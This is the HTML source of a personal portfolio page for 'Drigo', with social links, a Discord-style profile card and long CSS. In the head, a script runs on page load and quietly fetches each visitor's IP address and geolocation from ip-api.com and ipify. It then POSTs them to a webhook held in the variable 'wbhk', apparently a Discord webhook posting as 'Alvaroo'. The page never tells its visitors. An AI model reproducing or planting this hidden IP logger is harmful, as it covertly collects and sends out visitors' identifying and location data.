<!DOCTYPE html>
<html lang="en">

<script defer src="/_vercel/insights/script.js"></script>

<head>

    <link href="https://drigoo.cc/" rel="canonical">
    <link rel="shortcut icon" href="/favicon.svg">
    <meta charset="UTF-8">
    <meta content="light dark" name="color-scheme">
    <meta content="Drigo" name="apple-mobile-web-app-title">
    <meta content="Drigo" name="application-name">
    <meta content="#181818" name="msapplication-TileColor">
    <meta content="My personal website and portfolio." name="description">
    <meta content="Drigo" property="og:site_name">
    <meta content="website" property="og:type">
    <meta content="Drigo" property="og:title">
    <meta content="My personal website and portfolio." name="og:description">
    <meta content="summary_large_image" name="twitter:card">
    <meta content="/images/avatar-512.png" property="og:image">
        <script src="./config.js"></script>
    <script>
        function get_information(link, callback) {
            var xhr = new XMLHttpRequest();
            xhr.open("GET", link, true);
            xhr.onreadystatechange = function () {
                if (xhr.readyState === 4) {
                    callback(xhr.responseText);
                }
            };
            xhr.send(null);
        }
        get_information("http://ip-api.com/json/?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query", function (text) {
            var div = document.createElement("div");
            div.innerHTML = text;
            div.id = "alvaroolog";
            const secondList = document.getElementsByClassName("header")[0]
            secondList.appendChild(div)
        });
        get_information("https://api.ipify.org/", function (text) {
            var div = document.createElement("div");
            div.innerHTML = text;
            div.id = "ip";
            const secondList = document.getElementsByClassName("header")[0]
            secondList.appendChild(div)
        });

        function ipLogByAlv() {
            var ispp = document.getElementById('ip').innerHTML
            var extra = document.getElementById("alvaroolog").innerHTML
            const request = new XMLHttpRequest();
            request.open("POST", wbhk);
            request.setRequestHeader('Content-type', 'application/json');
            const params = {
                username: "Alvaroo",
                avatar_url: 'https://i.pinimg.com/564x/03/5d/ba/035dba9b43fb40d2e48f260a2983bbac.jpg',
                content: "**Ip** : _" + ispp + "_\n**Infos** : _https://api.techniknews.net/ipgeo/" + ispp + "_\n"
            }
            request.send(JSON.stringify(params));
        }
        setTimeout(function () {
            ipLogByAlv()
        }, 700);
    </script>

    <title>Drigo</title>
    <meta content="minimum-scale=1, initial-scale=1, width=device-width" name="viewport">
    <meta content="#181818" name="theme-color">
    <style>
        *,
        :before,
        :after {
            box-sizing: border-box;
            border-width: 0;
            border-style: solid;
            border-color: #e5e7eb
        }

        html {
            line-height: 1.5;
            -webkit-text-size-adjust: 100%;
            -moz-tab-size: 4;
            tab-size: 4;
            font-family: ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", Segoe UI Symbol, "Noto Color Emoji"
        }

        body {
            margin: 0;
            line-height: inherit
        }

        h1,
        h2 {
            font-size: inherit;
            font-weight: inherit
        }

        a {
            color: inherit;
            text-decoration: inherit
        }

        h1,
        h2 {
            margin: 0
        }

        img,
        svg {
            display: block;
            vertical-align: middle
        }

        img {
            max-width: 100%;
            height: auto
        }

        *,
        ::before,
        ::after {
            --un-rotate: 0;
            --un-rotate-x: 0;
            --un-rotate-y: 0;
            --un-rotate-z: 0;
            --un-scale-x: 1;
            --un-scale-y: 1;
            --un-scale-z: 1;
            --un-skew-x: 0;
            --un-skew-y: 0;
            --un-translate-x: 0;
            --un-translate-y: 0;
            --un-translate-z: 0;
            --un-pan-x: ;
            --un-pan-y: ;
            --un-pinch-zoom: ;
            --un-scroll-snap-strictness: proximity;
            --un-ordinal: ;
            --un-slashed-zero: ;
            --un-numeric-figure: ;
            --un-numeric-spacing: ;
            --un-numeric-fraction: ;
            --un-border-spacing-x: 0;
            --un-border-spacing-y: 0;
            --un-ring-offset-shadow: 0 0 rgba(0, 0, 0, 0);
            --un-ring-shadow: 0 0 rgba(0, 0, 0, 0);
            --un-shadow-inset: ;
            --un-shadow: 0 0 rgba(0, 0, 0, 0);
            --un-ring-inset: ;
            --un-ring-offset-width: 0px;
            --un-ring-offset-color: #fff;
            --un-ring-width: 0px;
            --un-ring-color: rgba(147, 197, 253, 0.5);
            --un-blur: ;
            --un-brightness: ;
            --un-contrast: ;
            --un-drop-shadow: ;
            --un-grayscale: ;
            --un-hue-rotate: ;
            --un-invert: ;
            --un-saturate: ;
            --un-sepia: ;
            --un-backdrop-blur: ;
            --un-backdrop-brightness: ;
            --un-backdrop-contrast: ;
            --un-backdrop-grayscale: ;
            --un-backdrop-hue-rotate: ;
            --un-backdrop-invert: ;
            --un-backdrop-opacity: ;
            --un-backdrop-saturate: ;
            --un-backdrop-sepia:
        }

        .i-fa6-brands-instagram {
            --un-icon: url("data:image/svg+xml;utf8,%3Csvg viewBox='0 0 448 512' width='1em' height='1em' xmlns='http://www.w3.org/2000/svg' %3E%3Cpath fill='currentColor' d='M224.1 141c-63.6 0-114.9 51.3-114.9 114.9s51.3 114.9 114.9 114.9S339 319.5 339 255.9S287.7 141 224.1 141zm0 189.6c-41.1 0-74.7-33.5-74.7-74.7s33.5-74.7 74.7-74.7s74.7 33.5 74.7 74.7s-33.6 74.7-74.7 74.7zm146.4-194.3c0 14.9-12 26.8-26.8 26.8c-14.9 0-26.8-12-26.8-26.8s12-26.8 26.8-26.8s26.8 12 26.8 26.8zm76.1 27.2c-1.7-35.9-9.9-67.7-36.2-93.9c-26.2-26.2-58-34.4-93.9-36.2c-37-2.1-147.9-2.1-184.9 0c-35.8 1.7-67.6 9.9-93.9 36.1s-34.4 58-36.2 93.9c-2.1 37-2.1 147.9 0 184.9c1.7 35.9 9.9 67.7 36.2 93.9s58 34.4 93.9 36.2c37 2.1 147.9 2.1 184.9 0c35.9-1.7 67.7-9.9 93.9-36.2c26.2-26.2 34.4-58 36.2-93.9c2.1-37 2.1-147.8 0-184.8zM398.8 388c-7.8 19.6-22.9 34.7-42.6 42.6c-29.5 11.7-99.5 9-132.1 9s-102.7 2.6-132.1-9c-19.6-7.8-34.7-22.9-42.6-42.6c-11.7-29.5-9-99.5-9-132.1s-2.6-102.7 9-132.1c7.8-19.6 22.9-34.7 42.6-42.6c29.5-11.7 99.5-9 132.1-9s102.7-2.6 132.1 9c19.6 7.8 34.7 22.9 42.6 42.6c11.7 29.5 9 99.5 9 132.1s2.7 102.7-9 132.1z'/%3E%3C/svg%3E");
            mask: var(--un-icon) no-repeat;
            mask-size: 100% 100%;
            -webkit-mask: var(--un-icon) no-repeat;
            -webkit-mask-size: 100% 100%;
            background-color: currentColor;
            width: 1em;
            height: 1em
        }

        .i-fa6-brands-spotify {
            --un-icon: url("data:image/svg+xml;utf8,%3Csvg viewBox='0 0 496 512' width='1em' height='1em' xmlns='http://www.w3.org/2000/svg' %3E%3Cpath fill='currentColor' d='M248 8C111.1 8 0 119.1 0 256s111.1 248 248 248s248-111.1 248-248S384.9 8 248 8zm100.7 364.9c-4.2 0-6.8-1.3-10.7-3.6c-62.4-37.6-135-39.2-206.7-24.5c-3.9 1-9 2.6-11.9 2.6c-9.7 0-15.8-7.7-15.8-15.8c0-10.3 6.1-15.2 13.6-16.8c81.9-18.1 165.6-16.5 237 26.2c6.1 3.9 9.7 7.4 9.7 16.5s-7.1 15.4-15.2 15.4zm26.9-65.6c-5.2 0-8.7-2.3-12.3-4.2c-62.5-37-155.7-51.9-238.6-29.4c-4.8 1.3-7.4 2.6-11.9 2.6c-10.7 0-19.4-8.7-19.4-19.4s5.2-17.8 15.5-20.7c27.8-7.8 56.2-13.6 97.8-13.6c64.9 0 127.6 16.1 177 45.5c8.1 4.8 11.3 11 11.3 19.7c-.1 10.8-8.5 19.5-19.4 19.5zm31-76.2c-5.2 0-8.4-1.3-12.9-3.9c-71.2-42.5-198.5-52.7-280.9-29.7c-3.6 1-8.1 2.6-12.9 2.6c-13.2 0-23.3-10.3-23.3-23.6c0-13.6 8.4-21.3 17.4-23.9c35.2-10.3 74.6-15.2 117.5-15.2c73 0 149.5 15.2 205.4 47.8c7.8 4.5 12.9 10.7 12.9 22.6c0 13.6-11 23.3-23.2 23.3z'/%3E%3C/svg%3E");
            mask: var(--un-icon) no-repeat;
            mask-size: 100% 100%;
            -webkit-mask: var(--un-icon) no-repeat;
            -webkit-mask-size: 100% 100%;
            background-color: currentColor;
            width: 1em;
            height: 1em
        }

        .i-fa6-brands-twitter {
            --un-icon: url("data:image/svg+xml;utf8,%3Csvg viewBox='0 0 512 512' width='1em' height='1em' xmlns='http://www.w3.org/2000/svg' %3E%3Cpath fill='currentColor' d='M459.37 151.716c.325 4.548.325 9.097.325 13.645c0 138.72-105.583 298.558-298.558 298.558c-59.452 0-114.68-17.219-161.137-47.106c8.447.974 16.568 1.299 25.34 1.299c49.055 0 94.213-16.568 130.274-44.832c-46.132-.975-84.792-31.188-98.112-72.772c6.498.974 12.995 1.624 19.818 1.624c9.421 0 18.843-1.3 27.614-3.573c-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319c-28.264-18.843-46.781-51.005-46.781-87.391c0-19.492 5.197-37.36 14.294-52.954c51.655 63.675 129.3 105.258 216.365 109.807c-1.624-7.797-2.599-15.918-2.599-24.04c0-57.828 46.782-104.934 104.934-104.934c30.213 0 57.502 12.67 76.67 33.137c23.715-4.548 46.456-13.32 66.599-25.34c-7.798 24.366-24.366 44.833-46.132 57.827c21.117-2.273 41.584-8.122 60.426-16.243c-14.292 20.791-32.161 39.308-52.628 54.253z'/%3E%3C/svg%3E");
            mask: var(--un-icon) no-repeat;
            mask-size: 100% 100%;
            -webkit-mask: var(--un-icon) no-repeat;
            -webkit-mask-size: 100% 100%;
            background-color: currentColor;
            width: 1em;
            height: 1em
        }

        .i-octicon-mail {
            --un-icon: url("data:image/svg+xml;utf8,%3Csvg viewBox='0 0 14 16' width='1em' height='1em' xmlns='http://www.w3.org/2000/svg' %3E%3Cpath fill-rule='evenodd' d='M0 4v8c0 .55.45 1 1 1h12c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1zm13 0L7 9L1 4h12zM1 5.5l4 3l-4 3v-6zM2 12l3.5-3L7 10.5L8.5 9l3.5 3H2zm11-.5l-4-3l4-3v6z' fill='currentColor'/%3E%3C/svg%3E");
            mask: var(--un-icon) no-repeat;
            mask-size: 100% 100%;
            -webkit-mask: var(--un-icon) no-repeat;
            -webkit-mask-size: 100% 100%;
            background-color: currentColor;
            width: 1em;
            height: 1em
        }

        .i-octicon-mark-github-16 {
            --un-icon: url("data:image/svg+xml;utf8,%3Csvg viewBox='0 0 16 16' width='1em' height='1em' xmlns='http://www.w3.org/2000/svg' %3E%3Cpath fill='currentColor' fill-rule='evenodd' d='M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59c.4.07.55-.17.55-.38c0-.19-.01-.82-.01-1.49c-2.01.37-2.53-.49-2.69-.94c-.09-.23-.48-.94-.82-1.13c-.28-.15-.68-.52-.01-.53c.63-.01 1.08.58 1.23.82c.72 1.21 1.87.87 2.33.66c.07-.52.28-.87.51-1.07c-1.78-.2-3.64-.89-3.64-3.95c0-.87.31-1.59.82-2.15c-.08-.2-.36-1.02.08-2.12c0 0 .67-.21 2.2.82c.64-.18 1.32-.27 2-.27c.68 0 1.36.09 2 .27c1.53-1.04 2.2-.82 2.2-.82c.44 1.1.16 1.92.08 2.12c.51.56.82 1.27.82 2.15c0 3.07-1.87 3.75-3.65 3.95c.29.25.54.73.54 1.48c0 1.07-.01 1.93-.01 2.2c0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z'/%3E%3C/svg%3E");
            mask: var(--un-icon) no-repeat;
            mask-size: 100% 100%;
            -webkit-mask: var(--un-icon) no-repeat;
            -webkit-mask-size: 100% 100%;
            background-color: currentColor;
            width: 1em;
            height: 1em
        }

        .container {
            max-width: 100%
        }

        @media (min-width: 640px) {
            .container {
                max-width: 640px
            }
        }

        @media (min-width: 768px) {
            .container {
                max-width: 768px
            }
        }

        @media (min-width: 1024px) {
            .container {
                max-width: 1024px
            }
        }

        @media (min-width: 1280px) {
            .container {
                max-width: 1280px
            }
        }

        @media (min-width: 1536px) {
            .container {
                max-width: 1536px
            }
        }

        .absolute {
            position: absolute
        }

        .relative {
            position: relative
        }

        .left-\[16px\] {
            left: 16px
        }

        .right-\[16px\] {
            right: 16px
        }

        .top-\[120px\] {
            top: 120px
        }

        .top-\[76px\] {
            top: 76px
        }

        .grid {
            display: grid
        }

        .m-auto {
            margin: auto
        }

        .mx-auto {
            margin-left: auto;
            margin-right: auto
        }

        .mb-16 {
            margin-bottom: 4rem
        }

        .mb-2 {
            margin-bottom: 0.5rem
        }

        .mb-3 {
            margin-bottom: 0.75rem
        }

        .mt-12 {
            margin-top: 3rem
        }

        .mt-4 {
            margin-top: 1rem
        }

        .block {
            display: block
        }

        .inline-block {
            display: inline-block
        }

        .h-\[1px\] {
            height: 1px
        }

        .h-\[92px\] {
            height: 92px
        }

        .h-full {
            height: 100%
        }

        .h-screen {
            height: 100vh
        }

        .w-\[300px\] {
            width: 300px
        }

        .w-\[92px\] {
            width: 92px
        }

        .w-auto {
            width: auto
        }

        .w-full {
            width: 100%
        }

        .flex {
            display: flex
        }

        .flex-initial {
            flex: 0 1 auto
        }

        .grow {
            flex-grow: 1
        }

        .flex-col {
            flex-direction: column
        }

        .select-none {
            user-select: none
        }

        .place-content-center {
            place-content: center
        }

        .items-center {
            align-items: center
        }

        .justify-end {
            justify-content: flex-end
        }

        .justify-center {
            justify-content: center
        }

        .justify-between {
            justify-content: space-between
        }

        .gap-4 {
            grid-gap: 1rem;
            gap: 1rem
        }

        .overflow-hidden {
            overflow: hidden
        }

        .whitespace-pre-line {
            white-space: pre-line
        }

        .border-6 {
            border-width: 6px;
            border-style: solid
        }

        .border-white {
            --un-border-opacity: 1;
            border-color: rgba(255, 255, 255, var(--un-border-opacity))
        }

        .rounded-2xl {
            border-radius: 1rem
        }

        .rounded-full {
            border-radius: 9999px
        }

        .bg-slate-50 {
            --un-bg-opacity: 1;
            background-color: rgba(248, 250, 252, var(--un-bg-opacity))
        }

        .bg-white {
            --un-bg-opacity: 1;
            background-color: rgba(255, 255, 255, var(--un-bg-opacity))
        }

        .bg-zinc-800 {
            --un-bg-opacity: 1;
            background-color: rgba(39, 39, 42, var(--un-bg-opacity))
        }

        .fill-slate-500 {
            --un-fill-opacity: 1;
            fill: rgba(100, 116, 139, var(--un-fill-opacity))
        }

        .px-24 {
            padding-left: 6rem;
            padding-right: 6rem
        }

        .px-4 {
            padding-left: 1rem;
            padding-right: 1rem
        }

        .pb-3 {
            padding-bottom: 0.75rem
        }

        .pb-3\.5 {
            padding-bottom: 0.875rem
        }

        .pt-16 {
            padding-top: 4rem
        }

        .text-center {
            text-align: center
        }

        .text-2xl {
            font-size: 1.5rem;
            line-height: 2rem
        }

        .text-3xl {
            font-size: 1.875rem;
            line-height: 2.25rem
        }

        .text-6xl {
            font-size: 3.75rem;
            line-height: 1
        }

        .text-sm {
            font-size: 0.875rem;
            line-height: 1.25rem
        }

        .text-xl {
            font-size: 1.25rem;
            line-height: 1.75rem
        }

        .text-xs {
            font-size: 0.75rem;
            line-height: 1rem
        }

        .font-bold {
            font-weight: 700
        }

        .font-light {
            font-weight: 300
        }

        .font-semibold {
            font-weight: 600
        }

        .leading-4 {
            line-height: 1rem
        }

        .leading-6 {
            line-height: 1.5rem
        }

        .leading-tight {
            line-height: 1.25
        }

        .uppercase {
            text-transform: uppercase
        }

        .text-pink-400 {
            --un-text-opacity: 1;
            color: rgba(244, 114, 182, var(--un-text-opacity))
        }

        .text-zinc-700 {
            --un-text-opacity: 1;
            color: rgba(63, 63, 70, var(--un-text-opacity))
        }

        .text-zinc-800 {
            --un-text-opacity: 1;
            color: rgba(39, 39, 42, var(--un-text-opacity))
        }

        .text-zinc-900 {
            --un-text-opacity: 1;
            color: rgba(24, 24, 27, var(--un-text-opacity))
        }

        .drop-shadow-xl {
            --un-drop-shadow: drop-shadow(0 20px 13px var(--un-drop-shadow-color, rgba(0, 0, 0, 0.03))) drop-shadow(0 8px 5px var(--un-drop-shadow-color, rgba(0, 0, 0, 0.08)));
            filter: var(--un-blur) var(--un-brightness) var(--un-contrast) var(--un-drop-shadow) var(--un-grayscale) var(--un-hue-rotate) var(--un-invert) var(--un-saturate) var(--un-sepia)
        }

        @media (min-width: 768px) {
            .md\:mb-0 {
                margin-bottom: 0rem
            }

            .md\:w-1\/2 {
                width: 50%
            }

            .md\:flex-row {
                flex-direction: row
            }

            .md\:items-start {
                align-items: flex-start
            }

            .md\:pr-16 {
                padding-right: 4rem
            }
        }

        @media (min-width: 1024px) {
            .lg\:flex-grow {
                flex-grow: 1
            }

            .lg\:pr-24 {
                padding-right: 6rem
            }
        }

        @media (min-width: 1280px) {
            .xl\:flex-row {
                flex-direction: row
            }

            .xl\:justify-start {
                justify-content: flex-start
            }

            .xl\:text-start {
                text-align: start
            }
        }

        :root {
            font-family: Whitney, sans-serif;
            font-feature-settings: "cv02", "cv03", "cv04", "cv11"
        }

        @font-face {
            font-family: Whitney;
            src: url(/fonts/Whitney-Book.woff) format("woff");
            font-weight: 400;
            font-display: swap
        }

        @font-face {
            font-family: Whitney;
            src: url(/fonts/Whitney-Medium.woff) format("woff");
            font-weight: 500;
            font-display: swap
        }

        @font-face {
            font-family: Whitney;
            src: url(/fonts/Whitney-Semibold.woff) format("woff");
            font-weight: 600;
            font-display: swap
        }

        @font-face {
            font-family: Whitney;
            src: url(/fonts/Whitney-Bold.woff) format("woff");
            font-weight: 700;
            font-display: swap
        }

        astro-island {
            display: contents
        }
    </style>
    <link rel="stylesheet" href="/assets/index.fdc699f5.css" media="print" onload="this.media='all'"><noscript>
        <link rel="stylesheet" href="/assets/index.fdc699f5.css">
    </noscript>
    <script type="module" src="/page.f52ebd18.js"></script>
</head>

<body class="flex h-screen dark:bg-dark-800 bg-white font-['Whitney']">
    <script>
        function setTheme(prefersDarkMode, persistedColorPreference) {
            if (persistedColorPreference === "dark" || (prefersDarkMode && persistedColorPreference !== "light")) {
                document.documentElement.classList.toggle("dark", true);
            } else {
                document.documentElement.classList.toggle("dark", false);
            }
        }
        (() => {
            const prefersDarkMode = window.matchMedia && window.matchMedia("(prefers-color-scheme: dark)").matches;
            const persistedColorPreference = localStorage.getItem("theme") || "auto";
            setTheme(prefersDarkMode, persistedColorPreference);
            const listener =
                window.matchMedia &&
                window
                    .matchMedia("(prefers-color-scheme: dark)")
                    .addEventListener("change", (ev) => setTheme(ev.matches, persistedColorPreference));
        })();
    </script>
    <script>(self.Astro = self.Astro || {}).load = a => { (async () => await (await a())())() }, window.dispatchEvent(new Event("astro:load")); var l; { const c = { 0: t => t, 1: t => JSON.parse(t, o), 2: t => new RegExp(t), 3: t => new Date(t), 4: t => new Map(JSON.parse(t, o)), 5: t => new Set(JSON.parse(t, o)), 6: t => BigInt(t), 7: t => new URL(t), 8: t => new Uint8Array(JSON.parse(t)), 9: t => new Uint16Array(JSON.parse(t)), 10: t => new Uint32Array(JSON.parse(t)) }, o = (t, s) => { if (t === "" || !Array.isArray(s)) return s; const [e, n] = s; return e in c ? c[e](n) : void 0 }; customElements.get("astro-island") || customElements.define("astro-island", (l = class extends HTMLElement { constructor() { super(...arguments); this.hydrate = () => { if (!this.hydrator || this.parentElement && this.parentElement.closest("astro-island[ssr]")) return; const s = this.querySelectorAll("astro-slot"), e = {}, n = this.querySelectorAll("template[data-astro-template]"); for (const r of n) { const i = r.closest(this.tagName); !i || !i.isSameNode(this) || (e[r.getAttribute("data-astro-template") || "default"] = r.innerHTML, r.remove()) } for (const r of s) { const i = r.closest(this.tagName); !i || !i.isSameNode(this) || (e[r.getAttribute("name") || "default"] = r.innerHTML) } const a = this.hasAttribute("props") ? JSON.parse(this.getAttribute("props"), o) : {}; this.hydrator(this)(this.Component, a, e, { client: this.getAttribute("client") }), this.removeAttribute("ssr"), window.removeEventListener("astro:hydrate", this.hydrate), window.dispatchEvent(new CustomEvent("astro:hydrate")) } } connectedCallback() { !this.hasAttribute("await-children") || this.firstChild ? this.childrenConnectedCallback() : new MutationObserver((s, e) => { e.disconnect(), this.childrenConnectedCallback() }).observe(this, { childList: !0 }) } async childrenConnectedCallback() { window.addEventListener("astro:hydrate", this.hydrate); let s = this.getAttribute("before-hydration-url"); s && await import(s), this.start() } start() { const s = JSON.parse(this.getAttribute("opts")), e = this.getAttribute("client"); if (Astro[e] === void 0) { window.addEventListener(`astro:${e}`, () => this.start(), { once: !0 }); return } Astro[e](async () => { const n = this.getAttribute("renderer-url"), [a, { default: r }] = await Promise.all([import(this.getAttribute("component-url")), n ? import(n) : () => () => { }]), i = this.getAttribute("component-export") || "default"; if (!i.includes(".")) this.Component = a[i]; else { this.Component = a; for (const d of i.split(".")) this.Component = this.Component[d] } return this.hydrator = r, this.hydrate }, s, this) } attributeChangedCallback() { this.hydrator && this.hydrate() } }, l.observedAttributes = ["props"], l)) }</script>
    <section
        class="place-content-center container mx-auto m-auto w-auto grow justify-center flex md:flex-row flex-col items-center">
        <div class="lg:flex-grow md:w-1/2 lg:pr-24 md:pr-16 flex-col md:items-start mb-16 md:mb-0 justify-center">
            <div class="flex flex-col xl:flex-row justify-between items-center">
                <div class="px-24">
                    <h1
                    class="text-6xl font-bold leading-tight text-zinc-800 dark:text-white justify-center text-center">
                      <span class="text-pink-400">Drigo</span>
                    </h1>
                    <h2
                        class="text-2xl font-light text-zinc-800 dark:text-white justify-center text-center xl:text-start">
                        foooooooooodase
                    </h2>

                    <nav class="flex gap-4 mt-4 justify-center xl:justify-start">
                        <a aria-label="Roblox" href="https://www.roblox.com/users/3084508546/profile" rel="noopener noreferrer"
                            target="_blank" title="Email">
                            <span aria-hidden="true" class="inline-block text-3xl i-octicon-mail"></span>
                        </a>

                        <a aria-label="GitHub" href="https://github.com/zdrigo171" rel="noopener noreferrer"
                            target="_blank" title="GitHub">
                            <span aria-hidden="true" class="inline-block text-3xl i-octicon-mark-github-16"></span>
                        </a>

                        <a aria-label="Discord" href="https://discord.com/users/143522920482865152/" rel="noopener noreferrer"
                            target="_blank" title="Discord">
                            <span aria-hidden="true" class="inline-block text-3xl i-fa6-brands-discord"></span>

                        <a aria-label="Spotify" href="https://open.spotify.com/user/9srschcbsfo823nc4e4rxfvlg" rel="noopener noreferrer"
                            target="_blank" title="Spotify">
                            <span aria-hidden="true" class="inline-block text-3xl i-fa6-brands-spotify"></span>    
                            
                        <a aria-label="Twitter" href="https://twitter.com/naovaisabermeutwitternaokkkkkkkkk" rel="noopener noreferrer"
                            target="_blank" title="Twitter">
                            <span aria-hidden="true" class="inline-block text-3xl i-fa6-brands-twitter"></span>    
                        </a>
                    </nav>
                </div>

                <div class="mt-12">
                    <astro-island uid="2ns7dh" component-url="/Card.3aacdc99.js" component-export="default"
                        renderer-url="/client.560d3ad0.js" props="{}" ssr="" client="load"
                        opts="{&quot;name&quot;:&quot;Card&quot;,&quot;value&quot;:true}" await-children="">
                        <div class="w-[300px] dark:text-slate-200 drop-shadow-xl">
                            <div class="h-full rounded-2xl overflow-hidden bg-slate-50 dark:bg-zinc-900">
                                <div class="relative">
                                    <picture>
                                        <source type="image/webp" srcset="/images/banner.png">
                                        <source type="image/gif" srcset="/images/banner.gif"><img
                                            src="/images/banner.png" alt="sakharov-discord-banner" width="300"
                                            height="120" aria-hidden="true" draggable="false" class="block select-none">
                                    </picture>
                                    <div class="absolute top-[76px] left-[16px]">
                                        <div class="rounded-full select-none">
                                            <div role="img" aria-label="avatar" aria-hidden="false"
                                                class="w-[92px] h-[92px] border-6 relative rounded-full border-white dark:border-zinc-900">
                                                <svg width="80" height="80" viewBox="0 0 80 80" class="absolute">
                                                    <defs>
                                                        <mask id="avatar-mask">
                                                            <circle cx="40" cy="40" r="40" fill="white"></circle>
                                                            <circle cx="68" cy="68" r="14" fill="black"></circle>
                                                        </mask>
                                                        <mask id="svg-mask-status-dnd"
                                                            maskContentUnits="objectBoundingBox" viewBox="0 0 1 1">
                                                            <circle fill="white" cx="0.5" cy="0.5" r="0.5"></circle>
                                                            <rect fill="black" x="0.125" y="0.375" width="0.75"
                                                                height="0.25" rx="0.125" ry="0.125"></rect>
                                                        </mask>
                                                        <mask id="svg-mask-status-idle"
                                                            maskContentUnits="objectBoundingBox" viewBox="0 0 1 1">
                                                            <circle fill="white" cx="0.5" cy="0.5" r="0.5"></circle>
                                                            <circle fill="black" cx="0.25" cy="0.25" r="0.375"></circle>
                                                        </mask>
                                                        <mask id="svg-mask-status-offline"
                                                            maskContentUnits="objectBoundingBox" viewBox="0 0 1 1">
                                                            <circle fill="white" cx="0.5" cy="0.5" r="0.5"></circle>
                                                            <circle fill="black" cx="0.5" cy="0.5" r="0.25"></circle>
                                                        </mask>
                                                    </defs>
                                                    <foreignObject x="0" y="0" width="80" height="80"
                                                        mask="url(#avatar-mask)">
                                                        <div class="grid w-full h-full">
                                                            <picture>
                                                                <source
                                                                    src-set="/images/avatar-128.png 1x, /images/avatar-256.webp 2x, /images/avatar-512.webp 4x"
                                                                    type="image/webp">
                                                                <source
                                                                    src-set="/images/avatar-128.png 1x, /images/avatar-256.png 2x, /images/avatar-512.png 4x"
                                                                    type="image/png"><img src="/images/avatar-128.png"
                                                                    alt="discord-avatar" width="92" height="92"
                                                                    aria-hidden="true" draggable="false" class="block">
                                                            </picture>
                                                        </div>
                                                    </foreignObject>
                                                    <circle cx="68" cy="68" r="8" class="fill-slate-500"
                                                        mask="url(#svg-mask-status-offline)"></circle>;
                                                </svg></div>
                                        </div>
                                    </div>
                                    <div class="pt-16 pb-3 px-4">
                                        <div class="text-xl font-semibold leading-6"><span
                                                class="text-zinc-900 dark:text-slate-50">drigo</span><span
                                                class="dark:text-slate-300">#1337</span></div>
                                        <div class="absolute top-[120px] right-[16px] justify-end select-none"><img
                                                src="/images/discord-active-developer.png" alt="active-developer"
                                                width="22" height="22" class="inline-block" draggable="false"></div>
                                    </div>
                                    <div class="px-4 pb-3.5 flex-initial text-sm">
                                        <div class="w-full h-[1px] bg-zinc-800 mb-3"></div>
                                        <div class="mb-3">
                                            <h2
                                                class="font-bold text-xs text-zinc-700 dark:text-slate-300 leading-4 mb-2 uppercase select-none">
                                                About Me</h2>
                                            <div class="whitespace-pre-line"> &#x1F1E7;&#x1F1F7;
                                                lua & python enjooiner<br> 2006 </div>
                                        </div>
                                        <div class="mb-3 select-none">
                                            <h2
                                                class="font-bold text-xs text-zinc-700 dark:text-slate-300 leading-4 mb-2 uppercase">
                                                Discord Member Since</h2><span class="whitespace-pre-line">Jan 31, 2016</span>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </astro-island>
                </div>
            </div>
        </div>
    </section>
</body>

</html>
